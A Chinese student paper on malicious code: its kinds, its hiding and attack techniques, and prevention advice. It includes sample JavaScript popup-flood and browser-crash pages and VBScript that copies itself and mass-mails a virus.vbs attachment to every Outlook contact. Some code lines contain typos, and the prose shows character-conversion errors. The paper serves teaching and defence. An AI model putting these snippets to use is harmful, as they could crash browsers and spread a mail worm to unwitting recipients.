惡意代碼分析防治

惡意代碼分析與防治姓名：學(xué)號(hào)：班級(jí)：學(xué)院摘要：在Internet平安事件中，惡意代碼造成的經(jīng)濟(jì)損失占有最大的比例。惡意代碼主要包括計(jì)算機(jī)病毒〔Virus〕、蠕蟲〔Worm〕、木馬程序〔TrojanHorse〕、后門程序〔Backdoor〕、邏輯炸彈〔LogicBomb〕等等。與此同時(shí)，惡意代碼成為信息戰(zhàn)、網(wǎng)絡(luò)戰(zhàn)的重要手段。日益嚴(yán)重的惡意代碼問題，不僅使企業(yè)及用戶蒙受了巨大經(jīng)濟(jì)損失，而且使國(guó)家的平安面臨著嚴(yán)重威脅。關(guān)鍵詞：惡意代碼分析防治Abstract:EconomiclossescausedbymaliciouscodeaccountedforalargeproportioninInternetsecurityincidents.MaliciouscodemainlyincludesComputerVirus,Worm,TrojanHorse,Backdoor,LogicBombect.Meanwhile,maliciouscodebecomeimportantmeansofinformationwarfareandcyberwarfare.Maliciouscodeisagrowingproblem,whichnotonlycausescompaniesandusersgreateconomicdamage,butalsothreateninggravelynationalsecurity.Keywords:MaliciouscodeAnalysisPrevention一.惡意代碼概述惡意代碼〔UnwantedCode〕是指沒有作用卻會(huì)帶來(lái)危險(xiǎn)的代碼，一個(gè)最平安的定義是把所有不必要的代碼都看作是惡意的，不必要代碼比惡意代碼具有更寬泛的含義，包括所有可能與某個(gè)組織平安策略相沖突的軟件。定義一：惡意代碼又稱惡意軟件。這些軟件也可稱為廣告軟件、間諜軟件、惡意共享軟件。是指在未明確提示用戶或未經(jīng)用戶許可的情況下，在用戶計(jì)算機(jī)或其他終端上安裝運(yùn)行，侵犯用戶合法權(quán)益的軟件。與病毒或蠕蟲不同，這些軟件很多不是小團(tuán)體或者個(gè)人秘密地編寫和散播，反而有很多知名企業(yè)和團(tuán)體涉嫌此類軟件。有時(shí)也稱作流氓軟件。定義二：惡意代碼是指成心編制或設(shè)置的、對(duì)網(wǎng)絡(luò)或系統(tǒng)會(huì)產(chǎn)生威脅或潛在威脅的計(jì)算機(jī)代碼。最常見的惡意代碼有計(jì)算機(jī)病毒〔簡(jiǎn)稱病毒〕、特洛伊木馬〔簡(jiǎn)稱木馬〕、計(jì)算機(jī)蠕蟲〔簡(jiǎn)稱蠕蟲〕、后門、邏輯炸彈等。惡意代碼編寫者一般利用三類手段來(lái)傳播惡意代碼：軟件漏洞、用戶本身或者兩者的混合。有些惡意代碼是自啟動(dòng)的蠕蟲和嵌入腳本，本身就是軟件，這類惡意代碼對(duì)人的活動(dòng)沒有要求。一些像特洛伊木馬、電子郵件蠕蟲等惡意代碼，利用受害者的心理操縱他們執(zhí)行不平安的代碼；還有一些是哄騙用戶關(guān)閉保護(hù)措施來(lái)安裝惡意代碼。利用商品軟件缺陷的惡意代碼有CodeRed、KaK和BubbleBoy。它們完全依賴商業(yè)軟件產(chǎn)品的缺陷和弱點(diǎn)，比方溢出漏洞和可以在不適當(dāng)?shù)沫h(huán)境中執(zhí)行任意代碼。像沒有打補(bǔ)丁的IIS軟件就有輸入緩沖區(qū)溢出方面的缺陷。利用Web效勞缺陷的攻擊代碼有CodeRed、Nimda，Linux和Solaris上的蠕蟲也利用了遠(yuǎn)程計(jì)算機(jī)的缺陷。惡意代碼編寫者的一種典型手法是把惡意代碼郵件偽裝成其他惡意代碼受害者的感染報(bào)警郵件，惡意代碼受害者往往是Outlook地址簿中的用戶或者是緩沖區(qū)中WEB頁(yè)的用戶，這樣做可以最大可能的吸引受害者的注意力。一些惡意代碼的作者還表現(xiàn)了高度的心理操縱能力，LoveLetter就是一個(gè)突出的例子。一般用戶對(duì)來(lái)自陌生人的郵件附件越來(lái)越警惕，而惡意代碼的作者也設(shè)計(jì)一些誘餌吸引受害者的興趣。附件的使用正在和必將受到網(wǎng)關(guān)過濾程序的限制和阻斷，惡意代碼的編寫者也會(huì)設(shè)法繞過網(wǎng)關(guān)過濾程序的檢查。使用的手法可能包括采用模糊的文件類型，將公共的執(zhí)行文件類型壓縮成zip文件等等。惡意代碼的相關(guān)定義二.惡意代碼實(shí)現(xiàn)關(guān)鍵技術(shù)2.1.惡意代碼生存技術(shù)生存技術(shù)主要包括4方面：第一反跟蹤技術(shù)：提高自身的偽裝能力和防破譯能力，增加檢測(cè)和去除的難度,第二加密技術(shù)：自身保護(hù),第三模糊變換技術(shù)：多態(tài)，難以進(jìn)行基于特征的識(shí)別,第四自動(dòng)生產(chǎn)技術(shù)：簡(jiǎn)單實(shí)現(xiàn)惡意代碼的組合和變化2.2.惡意代碼攻擊技術(shù)2.2.1當(dāng)前操作系統(tǒng)中都有系統(tǒng)效勞和網(wǎng)絡(luò)效勞，它們都在系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載。進(jìn)程注入技術(shù)就是將這些與效勞相關(guān)的可執(zhí)行代碼作為載體，惡意代碼程序?qū)⒆陨砬度氲竭@些可執(zhí)行代碼之中，實(shí)現(xiàn)自身隱藏和啟動(dòng)的目的。這種形式的惡意代碼只須安裝一次，以后就會(huì)被自動(dòng)加載到可執(zhí)行文件的進(jìn)程中，并且會(huì)被多個(gè)效勞加載。只有系統(tǒng)關(guān)閉時(shí)，效勞才會(huì)結(jié)束，所以惡意代碼程序在系統(tǒng)運(yùn)行時(shí)始終保持激活狀態(tài)。比方惡意代碼“WinEggDropShell”可以注入Windows下的大局部效勞程序。.三線程技術(shù)在Windows操作系統(tǒng)中引入了線程的概念，一個(gè)進(jìn)程可以同時(shí)擁有多個(gè)并發(fā)線程。三線程技術(shù)就是指一個(gè)惡意代碼進(jìn)程同時(shí)開啟了三個(gè)線程，其中一個(gè)為主線程，負(fù)責(zé)遠(yuǎn)程控制的工作。另外兩個(gè)輔助線程是監(jiān)視線程和守護(hù)線程，監(jiān)視線程負(fù)責(zé)檢查惡意代碼程序是否被刪除或被停止自啟動(dòng)。守護(hù)線程注入其它可執(zhí)行文件內(nèi)，與惡意代碼進(jìn)程同步，一旦進(jìn)程被停止，它就會(huì)重新啟動(dòng)該進(jìn)程，并向主線程提供必要的數(shù)據(jù)，這樣就能保證惡意代碼運(yùn)行的可持續(xù)性。例如，“中國(guó)黑客”等就是采用這種技術(shù)的惡意代碼。2.2.3端口復(fù)用技術(shù)，系指重復(fù)利用系統(tǒng)網(wǎng)絡(luò)翻開的端口〔如25、80、135和139等常用端口〕傳送數(shù)據(jù)，這樣既可以欺騙防火墻，又可以少開新端口。端口復(fù)用是在保證端口默認(rèn)效勞正常工作的條件下復(fù)用，具有很強(qiáng)的欺騙性。例如，特洛伊木馬“Executor”利用80端口傳遞控制信息和數(shù)據(jù)，實(shí)現(xiàn)其遠(yuǎn)程控制的目的。超級(jí)管理技術(shù)一些惡意代碼還具有攻擊反惡意代碼軟件的能力。為了對(duì)抗反惡意代碼軟件，惡意代碼采用超級(jí)管理技術(shù)對(duì)反惡意代碼軟件系統(tǒng)進(jìn)行拒絕效勞攻擊，使反惡意代碼軟件無(wú)法正常運(yùn)行。例如，“廣外女生”是一個(gè)國(guó)產(chǎn)的特洛伊木馬，它采用超級(jí)管理技術(shù)對(duì)“金山毒霸”和“天網(wǎng)防火墻”進(jìn)行拒絕效勞攻擊。端口反向連接技術(shù)防火墻對(duì)于外部網(wǎng)絡(luò)進(jìn)入內(nèi)部網(wǎng)絡(luò)的數(shù)據(jù)流有嚴(yán)格的訪問控制策略，但對(duì)于從內(nèi)網(wǎng)到外網(wǎng)的數(shù)據(jù)卻疏于防范。端口反向連接技術(shù)，系指令惡意代碼攻擊的效勞端〔被控制端〕主動(dòng)連接客戶端〔控制端〕。國(guó)外的“Boinet”是最先實(shí)現(xiàn)這項(xiàng)技術(shù)的木馬程序，它可以通過ICO、IRC、和反向主動(dòng)連接這4種方式聯(lián)系客戶端。國(guó)內(nèi)最早實(shí)現(xiàn)端口反向連接技術(shù)的惡意代碼是“網(wǎng)絡(luò)神偷”?！盎银澴印蹦敲词沁@項(xiàng)技術(shù)的集大成者，它內(nèi)置FTP、域名、效勞端主動(dòng)連接這3種效勞端在線通知功能。.緩沖區(qū)溢出攻擊技術(shù)緩沖區(qū)溢出漏洞攻擊占遠(yuǎn)程網(wǎng)絡(luò)攻擊的80％。緩沖區(qū)溢出攻擊成為惡意代碼從被動(dòng)式傳播轉(zhuǎn)為主動(dòng)式傳播的主要途徑。例如，“紅色代碼”利用IISServer上IndexingService的緩沖區(qū)溢出漏洞完成攻擊、傳播和破壞等惡意目的?！澳崮愤_(dá)蠕蟲”利用IIS4.0/5.0DirectoryTraversal的弱點(diǎn)，以及紅色代碼II所留下的后門，完成其傳播過程。惡意代碼攻擊模型三.IE炸彈攻擊IE炸彈是一種潛伏在網(wǎng)頁(yè)中的，可以通過在目標(biāo)電腦上不斷彈出窗口，到達(dá)耗盡目標(biāo)點(diǎn)電腦統(tǒng)資源的代碼病毒。常見的IE炸彈在攻擊時(shí)，主要具有死循環(huán)、自動(dòng)翻開窗口、耗盡CPU等特點(diǎn)，下面分別介紹。3.1．死循環(huán)死循環(huán)是只在設(shè)計(jì)網(wǎng)頁(yè)時(shí)，在網(wǎng)頁(yè)中插入一段可使電腦持續(xù)運(yùn)行的代碼。插入這段代碼后，網(wǎng)頁(yè)會(huì)一直運(yùn)行并消耗系統(tǒng)資源，直至死機(jī)。<html><head><title>鄭思龍</title><meta-equiv="comtent-type"content="text/htmlcharset=gb2312"></head><bodtonload="windowbomb()"><scariptlanguace="javascript">functionwindowsbomb(){varicounter=0//dummycounterwhile(ture){window.open{":baidu","crashing"icounter,"width=1,height=1,resizable=no"}}}</script></body></html>在此代碼中，不難看出，導(dǎo)致代碼運(yùn)行循環(huán)的語(yǔ)句為函數(shù)WindowsBomb()中的while(true)語(yǔ)句。由于它是一個(gè)條件總是為“真”的循環(huán)，在沒有被強(qiáng)制中斷的情況下，它會(huì)一直循環(huán)下去。在這個(gè)循環(huán)中會(huì)試圖不斷地彈出窗口，從而一直消耗系統(tǒng)資源，直至可用資源被耗盡。圖1為包含此代碼網(wǎng)頁(yè)在翻開時(shí)的系統(tǒng)提示圖1ActiveX控件運(yùn)行提示圖2為運(yùn)行ActiveX控件時(shí)，經(jīng)常會(huì)見到的平安警告內(nèi)容。圖2平安警告可見，所謂的“IE炸彈”，其根本就是一段使用JavaScrpt腳本語(yǔ)言編制的調(diào)用ActiveX控件的死循環(huán)代碼。其惡意的目的，就是要通過運(yùn)行一個(gè)無(wú)限的循環(huán)來(lái)耗盡受害主機(jī)可用的系統(tǒng)資源，從而導(dǎo)致主機(jī)工作運(yùn)轉(zhuǎn)的不正常。3.2．自動(dòng)翻開彈窗所謂自動(dòng)翻開彈窗，是指用戶在翻開包含有此代碼的網(wǎng)員后，會(huì)自動(dòng)地、不斷地翻開許多新的彈出窗口。由于其翻開窗口的速度是自動(dòng)進(jìn)行的，通常會(huì)很快，因而很難將其一個(gè)個(gè)全部關(guān)閉。在圖3中的循環(huán)體中的語(yǔ)句，就是一個(gè)彈出百度搜索頁(yè)面的命令，運(yùn)行它的結(jié)果，就是彈出一個(gè)百度搜索頁(yè)面。由于是在無(wú)限制的反復(fù)循環(huán)體中，這個(gè)彈出的過程會(huì)不斷地、無(wú)休止的進(jìn)行下去。如下圖圖3自動(dòng)翻開新窗口讓這個(gè)代碼運(yùn)行下去，必然會(huì)導(dǎo)致系統(tǒng)的耗盡與崩潰。3.3IE瀏覽器崩潰IE瀏覽器崩潰的代碼設(shè)計(jì)是通過一定的特定代碼運(yùn)行，導(dǎo)致IE工作失常的攻擊方式，它通常也可以使用網(wǎng)頁(yè)惡意代碼來(lái)實(shí)現(xiàn)。給出了實(shí)現(xiàn)IE瀏覽器崩潰的原代碼。<html><body><script>varcolor=newArray;color[1]="yellow";color[2]="red";for(x=0;x<3;x++){document,bgColor=color[x]if(x==2){x=0;}}</script></body></html>IE瀏覽器崩潰代碼的運(yùn)行圖為包含此代碼網(wǎng)頁(yè)被翻開時(shí)，出現(xiàn)的運(yùn)行確認(rèn)提示圖4運(yùn)行確認(rèn)提示圖5給出了IE瀏覽器崩潰代碼運(yùn)行后的結(jié)果四．蠕蟲病毒4.1.蠕蟲病毒的自我復(fù)制能力SetobjFs=CreateObject(“Scripting.FileSystemObject”)objFs.CreateTextFile(“C:\virus.txt”，true)如果我們把這兩句話保存成為.vbs的VB腳本文件，點(diǎn)擊鼠標(biāo)就會(huì)在C盤中創(chuàng)立一個(gè)TXT文件了。如果我們把第二句改為：objFs.GetFile〔WScript.ScriptFullName〕.Copy(“C:\Virus.vbs”)該句前面是翻開這個(gè)腳本文件，WScript.ScriptFullName指明是這個(gè)程序本身，是一個(gè)完整的路徑文件名。GetFile函數(shù)獲得這個(gè)文件，Copy函數(shù)將這個(gè)文件復(fù)制到C盤根目錄下Virus.vbs文件。這么簡(jiǎn)單的兩句就實(shí)現(xiàn)了自我復(fù)制的功能，已經(jīng)具備病毒的根本特征，即自我復(fù)制能力。4.2.蠕蟲病毒的傳播性例子：VB腳本代碼,foxmail不支持MAPISetobjOA=Wscript.CreateObject〔“Outlook.Application”〕SetobjMapi=objOA.GetNameSpace〔“MAPI”〕 SetobjAddList=objMapi.AddressLists〔i〕 Forj=1ToobjAddList.AddressEntries.Count SetobjMail=objOA.CreateItem〔0〕 objMail.Recipients.Add〔objAddList.AddressEntries〔j〕〕 objMail.Subject=“你好!” objMail.Body=“這次給你的附件，是我的新文檔！” objMail.Attachments.Add〔“c:\virus.vbs”〕 objMail.Send NextNext五．惡意代碼的防范方法互聯(lián)網(wǎng)上形形色色的網(wǎng)絡(luò)陷阱，讓上網(wǎng)沖浪者聞之色變，其實(shí)，只要做好周密的防范，惡意代碼又奈我何？！第一招：升級(jí)IE瀏覽版本大局部的惡意代碼只對(duì)IE5.0版本有效，而無(wú)論是Windows98還是Windows2000，初始安裝時(shí)都是低于IE5.0的版本，因此千萬(wàn)不要圖一時(shí)之困，還是趕快升級(jí)吧！第二招：安裝天網(wǎng)防火墻天網(wǎng)防火墻除了有隔絕惡意網(wǎng)絡(luò)攻擊的功能外，它特有的天網(wǎng)平安檢測(cè)修復(fù)系統(tǒng)，對(duì)防范惡意代碼有特效。即使你使用的是IE5.0，用該系統(tǒng)